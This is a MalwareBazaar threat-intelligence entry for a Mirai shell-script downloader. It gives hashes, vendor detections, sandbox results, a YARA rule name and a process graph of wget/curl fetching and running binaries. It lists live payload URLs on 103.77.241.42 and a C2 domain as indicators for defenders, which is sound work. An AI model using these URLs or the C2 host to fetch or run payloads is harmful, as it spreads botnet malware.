MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e
SHA3-384 hash: f340a27ba5380d6f5d8480a87f4f57b7fcac5628d95ce9388bc0794955f5b2df7f403951ca42875d9cf98ccb2848c7e7
SHA1 hash: fac3e8b32ea7cc390ccfea16602b759e93967f6b
MD5 hash: e448f3693bfdb1b17f403fe7bc7c0407
humanhash: foxtrot-beer-thirteen-mirror
File name:1.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'314 bytes
First seen:2025-10-14 11:26:18 UTC
Last seen:2025-10-14 15:01:23 UTC
File type: sh
MIME type:text/x-shellscript
ssdeep 24:ItRZsHbhJk/lfzmsnTNWGgJ16PnLbwNIpKksnMEXhlsbAcGgJstlpk:i0FKFbTNW14vLmJhx+bABgJsJk
TLSH T1406180FA33424B336CAB89D3B2AA46457541449B98CF5F755FEC28A61C8CEC9EC41642
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.77.241.42/00101010101001/morte.x86f0454ecbe1c8e345f47bcdeec1ae1e5b4ab65d9e4fd4dff282f49d170f153aad Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.mips7c76263e2585d5392873abc6ca6e69729b49ef923b0f63303680cc416c712f1e Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arcb86f640ff55d462086aa7168773e84bb23d3892bd0de5aaf8096e33e34cdce2e Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.i468n/an/aelf ua-wget
http://103.77.241.42/00101010101001/morte.i6867a4c1d6ea998a8b77a7d31c69ff34e7bb976028ddff09004e189b9c791136ee2 Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.x86_64c340fdfb6b6c6331f9a31859d47675b645ab377513e7825ab4e7b49e690bb4aa Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.mpsl3eb73b8e5607915fa8acd7a06f5f8a4e130c6f0391f914de667aaaefacc1c699 Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm5f89e2c43a0688aba77d53a4c0389bab3c675d8449948be64b32fa939df5515d Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm580a861774c1057f75676efbd54e286849df44c53566fb3db3cc6a82b9ebcb6bb Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm6871cc3d6b98dc6e5558a4c37a970f58c4c1e96838c4a06bebf4d4fc82ccd9e1a Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.arm7445ff1f50ec4aba47a5a77cf1e4053958f3cb6e5fcbe0b73ffa2aaeb11bec2ad Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.ppc51c9a33930a575d37d0777ba2e7b5f77082aff344f536168c4ac5e788f1f23fa Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.spc5c44011d12ffc588f127d287617ef6b76596be86832d094b3e058dcab5d9bf26 Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.m68k0584c5ff65ef5df948e8638ab54e394efff52cc40a54a084b69affaa845a9013 Miraielf mirai ua-wget
http://103.77.241.42/00101010101001/morte.sh40e618351e2ba0a1c11b2e6aea9c2d913bee70ebb827b8064885f9563148f7f07 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
39
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-09-26T05:19:00Z UTC
Last seen:
2025-10-15T04:11:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/bf983b67-9b79-42ad-aeb3-475703e7d2da
Behavior Graph:
Download SVG
%3 guuid=eb9a1ec6-1800-0000-4e4d-2262c9090000 pid=2505 /usr/bin/sudo guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513 /tmp/sample.bin guuid=eb9a1ec6-1800-0000-4e4d-2262c9090000 pid=2505->guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513 execve guuid=248674c8-1800-0000-4e4d-2262d3090000 pid=2515 /usr/bin/cp guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=248674c8-1800-0000-4e4d-2262d3090000 pid=2515 execve guuid=60b7c2cd-1800-0000-4e4d-2262de090000 pid=2526 /usr/bin/wget net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=60b7c2cd-1800-0000-4e4d-2262de090000 pid=2526 execve guuid=482e6f9b-1b00-0000-4e4d-2262490f0000 pid=3913 /usr/bin/curl net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=482e6f9b-1b00-0000-4e4d-2262490f0000 pid=3913 execve guuid=8c664f41-1d00-0000-4e4d-226290130000 pid=5008 /usr/bin/chmod guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=8c664f41-1d00-0000-4e4d-226290130000 pid=5008 execve guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010 /tmp/morte.x86 net guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010 execve guuid=d6b44170-1e00-0000-4e4d-226271140000 pid=5233 /usr/bin/rm delete-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=d6b44170-1e00-0000-4e4d-226271140000 pid=5233 execve guuid=b9c29b70-1e00-0000-4e4d-226272140000 pid=5234 /usr/bin/wget net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=b9c29b70-1e00-0000-4e4d-226272140000 pid=5234 execve guuid=5a45cfe4-1f00-0000-4e4d-226289140000 pid=5257 /usr/bin/curl net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=5a45cfe4-1f00-0000-4e4d-226289140000 pid=5257 execve guuid=66139ede-2100-0000-4e4d-22629b140000 pid=5275 /usr/bin/chmod guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=66139ede-2100-0000-4e4d-22629b140000 pid=5275 execve guuid=8ab822df-2100-0000-4e4d-22629c140000 pid=5276 /usr/bin/bash guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=8ab822df-2100-0000-4e4d-22629c140000 pid=5276 clone guuid=bf6950e0-2100-0000-4e4d-22629e140000 pid=5278 /usr/bin/rm delete-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=bf6950e0-2100-0000-4e4d-22629e140000 pid=5278 execve guuid=8905dee0-2100-0000-4e4d-22629f140000 pid=5279 /usr/bin/wget net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=8905dee0-2100-0000-4e4d-22629f140000 pid=5279 execve guuid=99a4f26c-2600-0000-4e4d-2262a0140000 pid=5280 /usr/bin/curl net send-data write-file guuid=17cf1bc8-1800-0000-4e4d-2262d1090000 pid=2513->guuid=99a4f26c-2600-0000-4e4d-2262a0140000 pid=5280 execve 71c3d771-fc0c-5d57-9ce2-e1e3dc35e4f2 103.77.241.42:80 guuid=60b7c2cd-1800-0000-4e4d-2262de090000 pid=2526->71c3d771-fc0c-5d57-9ce2-e1e3dc35e4f2 send: 152B guuid=482e6f9b-1b00-0000-4e4d-2262490f0000 pid=3913->71c3d771-fc0c-5d57-9ce2-e1e3dc35e4f2 send: 101B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=ac9d1743-1d00-0000-4e4d-226294130000 pid=5012 /tmp/morte.x86 guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010->guuid=ac9d1743-1d00-0000-4e4d-226294130000 pid=5012 clone guuid=a0602470-1e00-0000-4e4d-22626f140000 pid=5231 /tmp/morte.x86 guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010->guuid=a0602470-1e00-0000-4e4d-22626f140000 pid=5231 clone guuid=1bd32c70-1e00-0000-4e4d-226270140000 pid=5232 /tmp/morte.x86 net send-data zombie guuid=fe86fe41-1d00-0000-4e4d-226292130000 pid=5010->guuid=1bd32c70-1e00-0000-4e4d-226270140000 pid=5232 clone guuid=13452843-1d00-0000-4e4d-226295130000 pid=5013 /tmp/morte.x86 guuid=ac9d1743-1d00-0000-4e4d-226294130000 pid=5012->guuid=13452843-1d00-0000-4e4d-226295130000 pid=5013 clone guuid=13923243-1d00-0000-4e4d-226296130000 pid=5014 /tmp/morte.x86 dns net send-data zombie guuid=ac9d1743-1d00-0000-4e4d-226294130000 pid=5012->guuid=13923243-1d00-0000-4e4d-226296130000 pid=5014 clone guuid=13923243-1d00-0000-4e4d-226296130000 pid=5014->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 82B edcdac3a-73d2-5ab2-a7ec-cc70996c2d69 draft247.redirectme.net:12121 guuid=13923243-1d00-0000-4e4d-226296130000 pid=5014->edcdac3a-73d2-5ab2-a7ec-cc70996c2d69 send: 32B guuid=1bd32c70-1e00-0000-4e4d-226270140000 pid=5232->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 820B 8339bf61-d5d0-5d3e-bdae-2b1ca3dd64d3 103.77.241.144:80 guuid=1bd32c70-1e00-0000-4e4d-226270140000 pid=5232->8339bf61-d5d0-5d3e-bdae-2b1ca3dd64d3 send: 2B d308db0e-95e7-5190-8562-6f6532001047 draft247.redirectme.net:80 guuid=b9c29b70-1e00-0000-4e4d-226272140000 pid=5234->d308db0e-95e7-5190-8562-6f6532001047 send: 153B guuid=5a45cfe4-1f00-0000-4e4d-226289140000 pid=5257->d308db0e-95e7-5190-8562-6f6532001047 send: 102B guuid=8905dee0-2100-0000-4e4d-22629f140000 pid=5279->d308db0e-95e7-5190-8562-6f6532001047 send: 152B guuid=99a4f26c-2600-0000-4e4d-2262a0140000 pid=5280->d308db0e-95e7-5190-8562-6f6532001047 send: 101B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e/
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-09-26 10:52:16 UTC
File Type:
Text (Shell)
AV detection:
23 of 38 (60.53%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=7ozduzwlh2zbybas47p3j2qypmpcw7wtleo2jjvwsyopafyfzspa._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/251014-nj2b1s1qy3/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware Config
C2 Extraction:
draft247.redirectme.net
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/fbb23a66cb3e/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.42
Link:
https://yomi.yoroi.company/submissions/fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh fbb23a66cb3eb21c0412e7dfb4ea187b1e2b7ed3591da4a6b6961cf01705cc9e

(this sample)

Mirai

elf f0454ecbe1c8e345f47bcdeec1ae1e5b4ab65d9e4fd4dff282f49d170f153aad

  
URLhaus
https://urlhaus.abuse.ch/url/3634681/
  
Delivery method
Distributed via web download
  
Dropping
MD5 b4d6d956b1e1147b79604dc8751a2453
  
Dropping
SHA256 f0454ecbe1c8e345f47bcdeec1ae1e5b4ab65d9e4fd4dff282f49d170f153aad
  
URLhaus
https://urlhaus.abuse.ch/url/3656454/

Comments